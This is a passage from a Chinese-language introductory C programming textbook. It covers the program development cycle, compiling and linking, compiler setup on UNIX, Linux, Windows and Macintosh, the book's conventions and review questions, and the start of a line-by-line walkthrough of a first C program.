选的。但是,随着要处理的情况越来越复杂,需要决策和考虑的方面也越来 越多。通常,选择一个合适的方式表示信息可以更容易地设计程序和处理数 据。 再次强调,应该用一般术语来描述问题,而不是用具体的代码。但是, 你的某些决策可能取决于语言的特性。例如,在数据表示方面,C的程序员 就比Pascal的程序员有更多选择。 1.7.3 第3步:编写代码 设计好程序后,就可以编写代码来实现它。也就是说,把你设计的程序 翻译成 C语言。这里是真正需要使用C语言的地方。可以把思路写在纸上, 但是最终还是要把代码输入计算机。这个过程的机制取决于编程环境,我们 稍后会详细介绍一些常见的环境。一般而言,使用文本编辑器创建源代码文 件。该文件中内容就是你翻译的C语言代码。程序清单1.1是一个C源代码的 示例。 程序清单1.1 C源代码示例 #include <stdio.h> 43 int main(void) { int dogs; printf("How many dogs do you have?\n"); scanf("%d", &dogs); printf("So you have %d dog(s)!\n", dogs); return 0; } 在这一步骤中,应该给自己编写的程序添加文字注释。最简单的方式是 使用 C的注释工具在源代码中加入对代码的解释。第2章将详细介绍如何在 代码中添加注释。 1.7.4 第4步:编译 接下来的这一步是编译源代码。再次提醒读者注意,编译的细节取决于 编程的环境,我们稍后马上介绍一些常见的编程环境。现在,先从概念的角 度讲解编译发生了什么事情。 前面介绍过,编译器是把源代码转换成可执行代码的程序。可执行代码 是用计算机的机器语言表示的代码。这种语言由数字码表示的指令组成。如 前所述,不同的计算机使用不同的机器语言方案。C 编译器负责把C代码翻 译成特定的机器语言。此外,C编译器还将源代码与C库(库中包含大量的 标准函数供用户使用,如printf()和scanf())的代码合并成最终的程序(更精 确地说,应该是由一个被称为链接器的程序来链接库函数,但是在大多数系 统中,编译器运行链接器)。其结果是,生成一个用户可以运行的可执行文 件,其中包含着计算机能理解的代码。 44 编译器还会检查C语言程序是否有效。如果C编译器发现错误,就不生 成可执行文件并报错。理解特定编译器报告的错误或警告信息是程序员要掌 握的另一项技能。 1.7.5 第5步:运行程序 传统上,可执行文件是可运行的程序。在常见环境(包括Windows命令 提示符模式、UNIX终端模式和Linux终端模式)中运行程序要输入可执行文 件的文件名,而其他环境可能要运行命令(如,在VAX中的VMS[2])或一 些其他机制。例如,在Windows和Macintosh提供的集成开发环境(IDE) 中,用户可以在IDE中通过选择菜单中的选项或按下特殊键来编辑和执行C 程序。最终生成的程序可通过单击或双击文件名或图标直接在操作系统中运 行。 1.7.6 第6步:测试和调试程序 程序能运行是个好迹象,但有时也可能会出现运行错误。接下来,应该 检查程序是否按照你所设计的思路运行。你会发现你的程序中有一些错误, 计算机行话叫作bug。查找并修复程序错误的过程叫调试。学习的过程中不 可避免会犯错,学习编程也是如此。因此,当你把所学的知识应用于编程 时,最好为自己会犯错做好心理准备。随着你越来越老练,你所写的程序中 的错误也会越来越不易察觉。 将来犯错的机会很多。你可能会犯基本的设计错误,可能错误地实现了 一个好想法,可能忽视了输入检查导致程序瘫痪,可能会把圆括号放错地 方,可能误用 C语言或打错字,等等。把你将来犯错的地方列出来,这份错 误列表应该会很长。 看到这里你可能会有些绝望,但是情况没那么糟。现在的编译器会捕获 许多错误,而且自己也可以找到编译器未发现的错误。在学习本书的过程 中,我们会给读者提供一些调试的建议。 1.7.7 第7步:维护和修改代码 45 创建完程序后,你发现程序有错,或者想扩展程序的用途,这时就要修 改程序。例如,用户输入以Zz开头的姓名时程序出现错误、你想到了一个更 好的解决方案、想添加一个更好的新特性,或者要修改程序使其能在不同的 计算机系统中运行,等等。如果在编写程序时清楚地做了注释并采用了合理 的设计方案,这些事情都很简单。 1.7.8 说明 编程并非像描述那样是一个线性的过程。有时,要在不同的步骤之间往 复。例如,在写代码时发现之前的设计不切实际,或者想到了一个更好的解 决方案,或者等程序运行后,想改变原来的设计思路。对程序做文字注释为 今后的修改提供了方便。 许多初学者经常忽略第1步和第2步(定义程序目标和设计程序),直接 跳到第3步(编写代码)。刚开始学习时,编写的程序非常简单,完全可以 在脑中构思好整个过程。即使写错了,也很容易发现。但是,随着编写的程 序越来越庞大、越来越复杂,动脑不动手可不行,而且程序中隐藏的错误也 越来越难找。最终,那些跳过前两个步骤的人往往浪费了更多的时间,因为 他们写出的程序难看、缺乏条理、让人难以理解。要编写的程序越大越复 杂,事先定义和设计程序环节的工作量就越大。 磨刀不误砍柴工,应该养成先规划再动手编写代码的好习惯,用纸和笔 记录下程序的目标和设计框架。这样在编写代码的过程中会更加得心应手、 条理清晰。 46 1.8 编程机制 生成程序的具体过程因计算机环境而异。C是可移植性语言,因此可以 在许多环境中使用,包括UNIX、Linux、MS-DOS(一些人仍在使用)、 Windows和Macintosh OS。有些产品会随着时间的推移发生演变或被取代, 本书无法涵盖所有环境。 首先,来看看许多C环境(包括上面提到的5种环境)共有的一些方 面。虽然不必详细了解计算机内部如何运行C程序,但是,了解一下编程机 制不仅能丰富编程相关的背景知识,还有助于理解为何要经过一些特殊的步 骤才能得到C程序。 用C语言编写程序时,编写的内容被储存在文本文件中,该文件被称为 源代码文件(source code file)。大部分C系统,包括之前提到的,都要求文 件名以.c结尾(如,wordcount.c和budget.c)。在文件名中,点号(.)前面 的部分称为基本名(basename),点号后面的部分称为扩展名 (extension)。因此,budget是基本名,c是扩展名。基本名与扩展名的组合 (budget.c)就是文件名。文件名应该满足特定计算机操作系统的特殊要 求。例如,MS-DOS是IBM PC及其兼容机的操作系统,比较老旧,它要求基 本名不能超过8个字符。因此,刚才提到的文件名wordcount.c就是无效的 DOS文件名。有些UNIX系统限制整个文件名(包括扩展名)不超过14个字 符,而有些UNIX系统则允许使用更长的文件名,最多255个字符。Linux、 Windows和Macintosh OS都允许使用长文件名。 接下来,我们来看一下具体的应用,假设有一个名为concrete.c的源文 件,其中的C源代码如程序清单1.2所示。 程序清单1.2 c程序 #include <stdio.h> int main(void) 47 { printf("Concrete contains gravel and cement.\n"); return 0; } 如果看不懂程序清单1.2中的代码,不用担心,我们将在第2章学习相关 知识。 1.8.1 目标代码文件、可执行文件和库 C编程的基本策略是,用程序把源代码文件转换为可执行文件(其中包 含可直接运行的机器语言代码)。典型的C实现通过编译和链接两个步骤来 完成这一过程。编译器把源代码转换成中间代码,链接器把中间代码和其他 代码合并,生成可执行文件。C 使用这种分而治之的方法方便对程序进行模 块化,可以独立编译单独的模块,稍后再用链接器合并已编译的模块。通过 这种方式,如果只更改某个模块,不必因此重新编译其他模块。另外,链接 器还将你编写的程序和预编译的库代码合并。 中间文件有多种形式。我们在这里描述的是最普遍的一种形式,即把源 代码转换为机器语言代码,并把结果放在目标代码文件(或简称目标文件) 中(这里假设源代码只有一个文件)。虽然目标文件中包含机器语言代码, 但是并不能直接运行该文件。因为目标文件中储存的是编译器翻译的源代 码,这还不是一个完整的程序。 目标代码文件缺失启动代码(startup code)。启动代码充当着程序和操 作系统之间的接口。例如,可以在MS Windows或Linux系统下运行IBM PC兼 容机。这两种情况所使用的硬件相同,所以目标代码相同,但是Windows和 Linux所需的启动代码不同,因为这些系统处理程序的方式不同。 目标代码还缺少库函数。几乎所有的C程序都要使用C标准库中的函 数。例如,concrete.c中就使用了 printf()函数。目标代码文件并不包含该函 48 数的代码,它只包含了使用 printf()函数的指令。printf()函数真正的代码储存 在另一个被称为库的文件中。库文件中有许多函数的目标代码。 链接器的作用是,把你编写的目标代码、系统的标准启动代码和库代码 这 3 部分合并成一个文件,即可执行文件。对于库代码,链接器只会把程序 中要用到的库函数代码提取出来(见图1.4)。 图1.4 编译器和链接器 简而言之,目标文件和可执行文件都由机器语言指令组成的。然而,目 标文件中只包含编译器为你编写的代码翻译的机器语言代码,可执行文件中 还包含你编写的程序中使用的库函数和启动代码的机器代码。 49 在有些系统中,必须分别运行编译程序和链接程序,而在另一些系统 中,编译器会自动启动链接器,用户只需给出编译命令即可。 接下来,了解一些具体的系统。 1.8.2 UNIX系统 由于C语言因UNIX系统而生,也因此而流行,所以我们从UNIX系统开 始(注意:我们提到的UNIX还包含其他系统,如FreeBSD,它是UNIX的一 个分支,但是由于法律原因不使用该名称)。 1.在UNIX系统上编辑 UNIX C没有自己的编辑器,但是可以使用通用的UNIX编辑器,如 emacs、jove、vi或X Window System文本编辑器。 作为程序员,要负责输入正确的程序和为储存该程序的文件起一个合适 的文件名。如前所述,文件名应该以.c结尾。注意,UNIX区分大小写。因 此,budget.c、BUDGET.c和Budget.c是3个不同但都有效的C源文件名。但是 BUDGET.C是无效文件名,因为该名称的扩展名使用了大写C而不是小写c。 假设我们在vi编译器中编写了下面的程序,并将其储存在inform.c文件 中: #include <stdio.h> int main(void) { printf("A .c is used to end a C program filename.\n"); return 0; } 50 以上文本就是源代码,inform.c是源文件。注意,源文件是整个编译过 程的开始,不是结束。 2.在UNIX系统上编译 虽然在我们看来,程序完美无缺,但是对计算机而言,这是一堆乱码。 计算机不明白#include 和printf是什么(也许你现在也不明白,但是学到后面 就会明白,而计算机却不会)。如前所述,我们需要编译器将我们编写的代 码(源代码)翻译成计算机能看懂的代码(机器代码)。最后生成的可执行 文件中包含计算机要完成任务所需的所有机器代码。 以前,UNIX C编译器要调用语言定义的cc命令。但是,它没有跟上标 准发展的脚步,已经退出了历史舞台。但是,UNIX系统提供的C编译器通常 来自一些其他源,然后以cc命令作为编译器的别名。因此,虽然在不同的系 统中会调用不同的编译器,但用户仍可以继续使用相同的命令。 编译inform.c,要输入以下命令: cc inform.c 几秒钟后,会返回 UNIX 的提示,告诉用户任务已完成。如果程序编写 错误,你可能会看到警告或错误消息,但我们先假设编写的程序完全正确 (如果编译器报告void的错误,说明你的系统未更新成ANSI C编译器,只需 删除void即可)。如果使用ls命令列出文件,会发现有一个a.out文件(见图 1.5)。该文件是包含已翻译(或已编译)程序的可执行文件。要运行该文 件,只需输入: a.out 输出内容如下: A .c is used to end a C program filename. 51 图1.5 用UNIX准备C程序 如果要储存可执行文件(a.out),应该把它重命名。否则,该文件会被 下一次编译程序时生成的新a.out文件替换。 如何处理目标代码?C 编译器会创建一个与源代码基本名相同的目标代 码文件,但是其扩展名是.o。在该例中,目标代码文件是 inform.o。然而, 却找不到这个文件,因为一旦链接器生成了完整的可执行程序,就会将其删 除。如果原始程序有多个源代码文件,则保留目标代码文件。学到后面多文 52 件程序时,你会明白到这样做的好处。 1.8.3 GNU编译器集合和LLVM项目 GNU项目始于1987年,是一个开发大量免费UNIX软件的集合(GNU的 意思是“GNU’s Not UNIX”,即GNU不是UNIX)。GNU编译器集合(也被称 为GCC,其中包含GCC C编译器)是该项目的产品之一。GCC在一个指导委 员会的带领下,持续不断地开发,它的C编译器紧跟C标准的改动。GCC有 各种版本以适应不同的硬件平台和操作系统,包括UNIX、Linux和 Windows。用gcc命令便可调用GCC C编译器。许多使用gcc的系统都用cc作 为gcc的别名。 LLVM项目成为cc的另一个替代品。该项目是与编译器相关的开源软件 集合,始于伊利诺伊大学的2000份研究项目。它的 Clang编译器处理 C代 码,可以通过 clang调用。有多种版本供不同的平台使用,包括Linux。2012 年,Clang成为FreeBSD的默认C编译器。Clang也对最新的C标准支持得很 好。 GNU和LLVM都可以使用-v选项来显示版本信息,因此各系统都使用cc 别名来代替gcc或clang命令。以下组合: cc -v 显示你所使用的编译器及其版本。 gcc和clang命令都可以根据不同的版本选择运行时选项来调用不同C标 准。 gcc -std=c99 inform.c[3] gcc -std=c1x inform.c gcc -std=c11 inform.c 53 第1行调用C99标准,第2行调用GCC接受C11之前的草案标准,第3行调 用GCC接受的C11标准版本。Clang编译器在这一点上用法与GCC相同。 1.8.4 Linux系统 Linux是一个开源、流行、类似于UNIX的操作系统,可在不同平台(包 括PC和Mac)上运行。在Linux中准备C程序与在UNIX系统中几乎一样,不 同的是要使用GNU提供的GCC公共域C编译器。编译命令类似于: gcc inform.c 注意,在安装Linux时,可选择是否安装GCC。如果之前没有安装 GCC,则必须安装。通常,安装过程会将cc作为gcc的别名,因此可以在命 令行中使用cc来代替gcc。 欲详细了解GCC和最新发布的版本,请访问 http://www.gnu.org/software/gcc/index.html。 1.8.5 PC的命令行编译器 C编译器不是标准Windows软件包的一部分,因此需要从别处获取并安 装C编译器。可以从互联网免费下载Cygwin和MinGW,这样便可在PC上通 过命令行使用GCC编译器。Cygwin在自己的视窗运行,模仿Linux命令行环 境,有一行命令提示。MinGW在Windows的命令提示模式中运行。这和GCC 的最新版本一样,支持C99和C11最新的一些功能。Borland的C++编译器5.5 也可以免费下载,支持C90。 源代码文件应该是文本文件,不是字处理器文件(字处理器文件包含许 多额外的信息,如字体和格式等)。因此,要使用文本编辑器(如, Windows Notepad)来编辑源代码。如果使用字处理器,要以文本模式另存 文件。源代码文件的扩展名应该是.c。一些字处理器会为文本文件自动添 加.txt 扩展名。如果出现这种情况,要更改文件名,把txt替换成c。 通常,C编译器生成的中间目标代码文件的扩展名是.obj(也可能是其 54 他扩展名)。与UNIX编译器不同,这些编译器在完成编译后通常不会删除 这些中间文件。有些编译器生成带.asm扩展名的汇编语言文件,而有些编译 器则使用自己特有的格式。 一些编译器在编译后会自动运行链接器,另一些要求用户手动运行链接 器。在可执行文件中链接的结果是,在原始的源代码基本名后面加上.exe扩 展名。例如,编译和链接concrete.c源代码文件,生成的是concrete.exe文件。 可以在命令行输入基本名来运行该程序: C>concrete 1.8.6 集成开发环境(Windows) 许多供应商(包括微软、Embarcadero、Digital Mars)都提供Windows 下的集成开发环境,或称为IDE(目前,大多数IDE都是C和C++结合的编译 器)。可以免费下载的IDE有Microsoft Visual Studio Express和Pelles C。利用 集成开发环境可以快速开发C程序。关键是,这些IDE都内置了用于编写C程 序的编辑器。这类集成开发环境都提供了各种菜单(如,命名、保存源代码 文件、编译程序、运行程序等),用户不用离开IDE就能顺利编写、编译和 运行程序。如果编译器发现错误,会返回编辑器中,标出有错误的行号,并 简单描述情况。 初次接触Windows IDE可能会望而生畏,因为它提供了多种目标 (target),即运行程序的多种环境。例如,IDE提供了32位Windows程序、 64位Windows程序、动态链接库文件(DLL)等。许多目标都涉及Windows 图形界面。要管理这些(及其他)选择,通常要先创建一个项目 (project),以便稍后在其中添加待使用的源代码文件名。不同的产品具体 步骤不同。一般而言,首先使用【文件】菜单或【项目】菜单创建一个项 目。选择正确的项目形式非常重要。本书中的例子都是一般示例,针对在简 单的命令行环境中运行而设计。Windows IDE提供多种选择以满足用户的不 同需求。例如,Microsoft Visual Studio提供【Win32控制台应用程序】选 项。对于其他系统,查找一个诸如【DOS EXE】、【Console】或 55 【Character Mode】的可执行选项。选择这些模式后,将在一个类控制台窗 口中运行可执行程序。选择好正确的项目类型后,使用IDE的菜单打开一个 新的源代码文件。对于大多数产品而言,使用【文件】菜单就能完成。你可 能需要其他步骤将源文件添加到项目中。 通常,Windows IDE既可处理C也可处理C++,因此要指定待处理的程序 是C还是C++。有些产品用项目类型来区分两者,有些产品(如,Microsoft Visual C++)用.c文件扩展名来指明使用C而不是C++。当然,大多数C程序 也可以作为C++程序运行。欲了解C和C++的区别,请参阅参考资料IX。 你可能会遇到一个问题:在程序执行完毕后,执行程序的窗口立即消 失。如果不希望出现这种情况,可以让程序暂停,直到按下Enter键,窗口 才消失。要实现这种效果,可以在程序的最后(return这行代码之前)添加 下面一行代码: getchar(); 该行读取一次键的按下,所以程序在用户按下Enter键之前会暂停。有 时根据程序的需要,可能还需要一个击键等待。这种情况下,必须用两次 getchar(): getchar(); getchar(); 例如,程序在最后提示用户输入体重。用户键入体重后,按下Enter键 以输入数据。程序将读取体重,第1个getchar()读取Enter键,第2个getchar() 会导致程序暂停,直至用户再次按下Enter键。如果你现在不知所云,没关 系,在学完C输出后就会明白。到时,我们会提醒读者使用这种方法。 虽然许多IDE在使用上大体一致,但是细节上有所不同。就一个产品的 系列而言,不同版本也是如此。要经过一段时间的实践,才会熟悉编译器的 工作方式。必要时,还需阅读使用手册或网上教程。 56 Microsoft Visual Studio和C标准 在Windows软件开发中,Microsoft Visual Studio及其免费版本Microsoft Visual Studio Express都久负盛名,它们与C标准的关系也很重要。然而,微 软鼓励程序员从C转向C++和C#。虽然Visual Studio支持C89/90,但是到目前 为止,它只选择性地支持那些在C++新特性中能找到的C标准(如,long long类型)。而且,自2012版本起,Visual Studio不再把C作为项目类型的选 项。尽管如此,本书中的绝大多数程序仍可用Visual Studio来编译。在新建 项目时,选择C++选项,然后选择【Win32控制台应用程序】,在应用设置 中选择【空项目】。几乎所有的C程序都能与C++程序兼容。所以,本书中 的绝大多数C程序都可作为C++程序运行。或者,在选择C++选项后,将默 认的源文件扩展名.cpp替换成.c,编译器便会使用C语言的规则代替C++。 1.8.7 Windows/Linux 许多Linux发行版都可以安装在Windows系统中,以创建双系统。一些存 储器会为Linux系统预留空间,以便可以启动Windows或Linux。可以在 Windows系统中运行Linux程序,或在Linux系统中运行Windows程序。不能通 过Windows系统访问Linux文件,但是可以通过Linux系统访问Windows文档。 1.8.8 Macintosh中的C 目前,苹果免费提供Xcode开发系统下载(过去,它有时免费,有时付 费)。它允许用户选择不同的编程语言,包括C语言。 Xcode 凭借可处理多种编程语言的能力,可用于多平台,开发超大型的 项目。但是,首先要学会如何编写简单的C程序。在Xcode 4.6中,通过 【File】菜单选择【New Project】,然后选择【OS X Application Command Line Tool】,接着输入产品名并选择C类型。Xcode使用Clang或GCC C编译 器来编译C代码,它以前默认使用GCC,但是现在默认使用Clang。可以设置 选择使用哪一个编译器和哪一套C标准(因为许可方面的事宜,Xcode中 Clang的版本比GCC的版本要新)。 57 UNIX系统内置Mac OS X,终端工具打开的窗口是让用户在UNIX命令行 环境中运行程序。苹果在标准软件包中不提供命令行编译器,但是,如果下 载了 Xcode,还可以下载可选的命令行工具,这样就可以使用clang和gcc命 令在命令行模式中编译。 58 1.9 本书的组织结构 本书采用多种方式编排内容,其中最直接的方法是介绍A主题的所有内 容、介绍B主题的所有内容,等等。这对参考类书籍来说尤为重要,读者可 以在同一处找到与主题相关的所有内容。但是,这通常不是学习的最佳顺 序。例如,如果在开始学习英语时,先学完所有的名词,那你的表达能力一 定很有限。虽然可以指着物品说出名称,但是,如果稍微学习一些名词、动 词、形容词等,再学习一些造句规则,那么你的表达能力一定会大幅提高。 为了让读者更好地吸收知识,本书采用螺旋式方法,先在前几个章节中 介绍一些主题,在后面章节再详细讨论相关内容。例如,对学习C语言而 言,理解函数至关重要。因此,我们在前几个章节中安排一些与函数相关的 内容,等读者学到第 9 章时,已对函数有所了解,学习使用函数会更加容 易。与此类似,前几章还概述了一些字符串和循环的内容。这样,读者在完 全弄懂这些内容之前,就可以在自己的程序中使用这些有用的工具。 59 1.10 本书的约定 在学习C语言之前,先介绍一下本书的格式。 1.10.1 字体 本书用类似在屏幕上或打印输出时的字体(一种等宽字体),表示文本 程序和计算机输入、输出。前面已经出现了多次,如果读者没有注意到,字 体如下所示: #include <stdio.h> int main(void) { printf("Concrete contains gravel and cement.\n"); return 0; } 在涉及与代码相关的术语时,也使用相同的等宽字体,如stdio.h。本书 用等宽斜体表示占位符,可以用具体的项替换这些占位符。例如,下面是一 个声明的模型: type_name variable_name; 这里,可用int替换type_name,用zebra_count替换variable_name。 1.10.2 程序输出 本书用相同的字体表示计算机的输出,粗体表示用户输入。例如,下面 是第14章中一个程序的输出: 60 Please enter the book title. Press [enter] at the start of a line to stop. My Life as a Budgie Now enter the author. Mack Zackles 如上所示,以标准计算机字体显示的行表示程序的输出,粗体行表示用 户的输入。 可以通过多种方式与计算机交互。在这里,我们假设读者使用键盘键入 内容,在屏幕上阅读计算机的响应。 1.特殊的击键 通常,通过按下标有 Enter、c/r、Return 或一些其他文字的键来发送指 令。本书将这些按键统一称为Enter键。一般情况下,我们默认你在每行输 入的末尾都会按下Enter键。尽管如此,为了标示一些特定的位置,本书使 用[enter]显式标出Enter键。方括号表示按下一次Enter键,而不是输入enter。 除此之外,书中还会提到控制字符(如,Ctrl+D)。这种写法的意思 是,在按下Ctrl键(也可能是Control键)的同时按下D键。 2.本书使用的系统 C 语言的某些方面(如,储存数字的空间大小)因系统而异。本书在示 例中提到“我们的系统”时,通常是指在iMac上运行OS X 10.8.4,使用Xcode 4.6.2开发系统的Clang 3.2编译器。本书的大部分程序都能使用Windows7系 统的Microsoft Visual Studio Express 2012和Pelles C 7.0,以及Ubuntu13.04 Linux系统的GCC 4.7.3进行编译。 3.读者的系统 61 你需要一个C编译器或访问一个C编译器。C程序可以在多种计算机系统 中运行,因此你的选择面很广。确保你使用的C编译器与当前使用的计算机 系统匹配。本书中,除了某些示例要求编译器支持C99或C11标准,其余大 部分示例都可在C90编译器中运行。如果你使用的编译器是早于ANSI/ISO的 老式编译器,在编译时肯定要经常调整,很不方便。与其如此,不如换个新 的编译器。 大部分编译器供应商都为学生和教学人员提供特惠版本,详情请查看供 应商的网站。 1.10.3 特殊元素 本书包含一些强调特定知识点的特殊元素,提示、注意、警告,将以如 下形式出现在本书中: 边栏 边栏提供更深入的讨论或额外的背景,有助于解释当前的主题。 提示 提示一般都短小精悍,帮助读者理解一些特殊的编程情况。 警告 用于警告读者注意一些潜在的陷阱。 注意 提供一些评论,提醒读者不要误入歧途。 62 1.11 本章小结 C是强大而简洁的编程语言。它之所以流行,在于自身提供大量的实用 编程工具,能很好地控制硬件。而且,与大多数其他程序相比,C程序更容 易从一个系统移植到另一个系统。 C是编译型语言。C编译器和链接器是把C语言源代码转换成可执行代码 的程序。 用C语言编程可能费力、困难,让你感到沮丧,但是它也可以激发你的 兴趣,让你兴奋、满意。我们希望你在愉快的学习过程中爱上C。 63 1.12 复习题 复习题的参考答案在附录A中。 1.对编程而言,可移植性意味着什么? 2.解释源代码文件、目标代码文件和可执行文件有什么区别? 3.编程的7个主要步骤是什么? 4.编译器的任务是什么? 5.链接器的任务是什么? 64 1.13 编程练习 我们尚未要求你编写C代码,该练习侧重于编程过程的早期步骤。 1.你刚被MacroMuscle有限公司聘用。该公司准备进入欧洲市场,需要 一个把英寸单位转换为厘米单位(1 英寸=2.54 厘米)的程序。该程序要提 示用户输入英寸值。你的任务是定义程序目标和设计程序(编程过程的第1 步和第2步)。 [1].国际C语言混乱代码大赛(IOCCC,The International Obfuscated C Code Contest)。这是一项国际编程赛事,从1984年开始,每年举办一次(1997、 1999、2002、2003和2006年除外),目的是写出最有创意且最让人难以理解 的C语言代码。——译者注 [2].VAX(Virtual Address eXtension)是一种可支持机器语言和虚拟地址的32 位小型计算机。VMS(Virtual Memory System)是旧名,现在叫OpenVMS, 是一种用于服务器的操作系统,可在VAX、Alpha或Itanium处理器系列平台 上运行。——译者注 [3].GCC最基本的用法是:gcc [options] [filenames],其中options是所需的参 数,filenames是文件名。——译者注 65 第2章 C语言概述 本章介绍以下内容: 运算符:= 函数:main()、printf() 编写一个简单的C程序 创建整型变量,为其赋值并在屏幕上显示其值 换行字符 如何在程序中写注释,创建包含多个函数的程序,发现程序的错误 什么是关键字 C程序是什么样子的?浏览本书,能看到许多示例。初见 C 程序会觉得 有些古怪,程序中有许多{、cp->tort和*ptr++这样的符号。然而,在学习C 的过程中,对这些符号和C语言特有的其他符号会越来越熟悉,甚至会喜欢 上它们。如果熟悉与C相关的其他语言,会对C语言有似曾相识的感觉。本 章,我们从演示一个简单的程序示例开始,解释该程序的功能。同时,强调 一些C语言的基本特性。 66 2.1 简单的C程序示例 我们来看一个简单的C程序,如程序清单2.1所示。该程序演示了用C语 言编程的一些基本特性。请先通读程序清单2.1,看看自己是否能明白该程 序的用途,再认真阅读后面的解释。 程序清单2.1 first.c程序 #include <stdio.h> int main(void)         /* 一个简单的C程序 */ { int num;          /* 定义一个名为num的变量 */ num = 1;          /* 为num赋一个值 */ printf("I am a simple "); /* 使用printf()函数 */ printf("computer.\n"); printf("My favorite number is %d because it is first.\n",num); return 0; } 如果你认为该程序会在屏幕上打印一些内容,那就对了!光看程序也许 并不知道打印的具体内容,所以,运行该程序,并查看结果。首先,用你熟 悉的编辑器(或者编译器提供的编辑器)创建一个包含程序清单2.1 中所有 内容的文件。给该文件命名,并以.c作为扩展名,以满足当前系统对文件名 的要求。例如,可以使用first.c。现在,编译并运行该程序(查看第1章,复 习该步骤的具体内容)。如果一切运行正常,该程序的输出应该是: 67 I am a simple computer. My favorite number is 1 because it is first. 总而言之,结果在意料之中,但是程序中的\n 和%d 是什么?程序中有 几行代码看起来有点奇怪。接下来,我们逐行解释这个程序。 程序调整 程序的输出是否在屏幕上一闪而过?某些窗口环境会在单独的窗口运行 程序,然后在程序运行结束后自动关闭窗口。如果遇到这种情况,可以在程 序中添加额外的代码,让窗口等待用户按下一个键后才关闭。一种方法是, 在程序的return语句前添加一行代码: getchar(); 这行代码会让程序等待击键,窗口会在用户按下一个键后才关闭。在第 8 章中会详细介绍 getchar()的内容。 68 2.2 示例解释 我们会把程序清单2.1的程序分析两遍。第1遍(快速概要)概述程序中 每行代码的作用,帮助读者初步了解程序。第2遍(程序细节)详细分析代 码的具体含义,帮助读者深入理解程序。 图2.1总结了组成C程序的几个部分[1],图中包含的元素比第1个程序 多。 图2.1 C程序解剖 69 2.2.1 第1遍:快速概要 本节简述程序中的每行代码的作用。下一节详细讨论代码的含义。 #include<stdio.h>   ←包含另一个文件 该行告诉编译器把stdio.h中的内容包含在当前程序中。stdio.h是C编译器 软件包的标准部分,它提供键盘输入和屏幕输出的支持。 int main(void)     ←函数名 C程序包含一个或多个函数,它们是C程序的基本模块。程序清单2.1的 程序中有一个名为main()的函数。圆括号表明main()是一个函数名。int表明 main()函数返回一个整数,void表明main()不带任何参数。这些内容我们稍后 详述。现在,只需记住int和void是标准ANSI C定义main()的一部分(如果使 用ANSI C之前的编译器,请省略void;考虑到兼容的问题,请尽量使用较新 的C编译器)。 /* 一个简单的C程序 */    ←注释 注释在/*和*/两个符号之间,这些注释能提高程序的可读性。注意,注 释只是为了帮助读者理解程序,编译器会忽略它们。 {    ←函数体开始 左花括号表示函数定义开始,右花括号(})表示函数定义结束。 int num;   ←声明 该声明表明,将使用一个名为num的变量,而且num是int(整数)类 型。 num = 1;   ←赋值表达式语句 语句num = 1;把值1赋给名为num的变量。 70 printf("I am a simple "); ←调用一个函数 该语句使用 printf()函数,在屏幕上显示 I am a simple,光标停在同一 行。printf()是标准的C库函数。在程序中使用函数叫作调用函数。 printf("computer.\n");   ←调用另一个函数 接下来调用的这个printf()函数在上条语句打印出来的内容后面加 上“computer”。代码\n告诉计算机另起一行,即把光标移至下一行。 printf("My favorite number is %d because it is first.\n", num); 最后调用的printf()把num的值(1)内嵌在用双引号括起来的内容中一并 打印。%d告诉计算机以何种形式输出num的值,打印在何处。 return 0;   ←return语句 C函数可以给调用方提供(或返回)一个数。目前,可暂时把该行看作 是结束main()函数的要求。 }    ←结束 必须以右花括号表示程序结束。 2.2.2 第2遍:程序细节 浏览完程序清单2.1后,我们来仔细分析这个程序。再次强调,本节将 逐行分析程序中的代码,以每行代码为出发点,深入分析代码背后的细节, 为更全面地学习C语言编程的特性夯实基础。 1.#include指令和头文件 #include<stdio.h> 这是程序的第1行。#include <stdio.h>的作用相当于把stdio.h文件中的所 有内容都输入该行所在的位置。实际上,这是一种“拷贝-粘贴”的操作。 71 include 文件提供了一种方便的途径共享许多程序共有的信息。 #include这行代码是一条C预处理器指令(preprocessor directive)。通 常,C编译器在编译前会对源代码做一些准备工作,即预处理 (preprocessing)。 所有的C编译器软件包都提供stdio.h文件。该文件中包含了供编译器使 用的输入和输出函数(如, printf())信息。该文件名的含义是标准输入/输 出头文件。通常,在C程序顶部的信息集合被称为头文件(header)。 在大多数情况下,头文件包含了编译器创建最终可执行程序要用到的信 息。例如,头文件中可以定义一些常量,或者指明函数名以及如何使用它 们。但是,函数的实际代码在一个预编译代码的库文件中。简而言之,头文 件帮助编译器把你的程序正确地组合在一起。 ANSI/ISO C规定了C编译器必须提供哪些头文件。有些程序要包含 stdio.h,而有些不用。特定C实现的文档中应该包含对C库函数的说明。这些 说明确定了使用哪些函数需要包含哪些头文件。例如,要使用printf()函数, 必须包含stdio.h头文件。省略必要的头文件可能不会影响某一特定程序,但 是最好不要这样做。本书每次用到库函数,都会用#include指令包含 ANSI/ISO标准指定的头文件。 注意 为何不内置输入和输出 读者一定很好奇,为何不把输入和输出这些基本功能内置在语言中。原 因之一是,并非所有的程序都会用到I/O(输入/输出)包。轻装上阵表现了 C语言的哲学。正是这种经济使用资源的原则,使得C语言成为流行的嵌入 式编程语言(例如,编写控制汽车自动燃油系统或蓝光播放机芯片的代 码)。#include中的#符号表明,C预处理器在编译器接手之前处理这条指 令。本书后面章节中会介绍更多预处理器指令的示例,第16章将更详细地讨 论相关内容。 2.main()函数 72 int main(void); 程序清单2.1中的第2行表明该函数名为main。的确,main是一个极其普 通的名称,但是这是唯一的选择。C程序一定从main()函数开始执行(目前 不必考虑例外的情况)。除了main()函数,你可以任意命名其他函数,而且 main()函数必须是开始的函数。圆括号有什么功能?用于识别main()是一个 函数。很快你将学到更多的函数。就目前而言,只需记住函数是C程序的基 本模块。 int是main()函数的返回类型。这表明main()函数返回的值是整数。返回 到哪里?返回给操作系统。我们将在第6章中再来探讨这个问题。 通常,函数名后面的圆括号中包含一些传入函数的信息。该例中没有传 递任何信息。因此,圆括号内是单词void(第11章将介绍把信息从main()函 数传回操作系统的另一种形式)。 如果浏览旧式的C代码,会发现程序以如下形式开始: main() C90标准勉强接受这种形式,但是C99和C11标准不允许这样写。因此, 即使你使用的编译器允许,也不要这样写。 你还会看到下面这种形式: void main() 一些编译器允许这样写,但是所有的标准都未认可这种写法。因此,编 译器不必接受这种形式,而且许多编译器都不能这样写。需要强调的是,只 要坚持使用标准形式,把程序从一个编译器移至另一个编译器时就不会出什 么问题。 3.注释 /*一个简单的程序*/ 73 在程序中,被/* */两个符号括起来的部分是程序的注释。写注释能让他 人(包括自己)更容易明白你所写的程序。C 语言注释的好处之一是,可将 注释放在任意的地方,甚至是与要解释的内容在同一行。较长的注释可单独 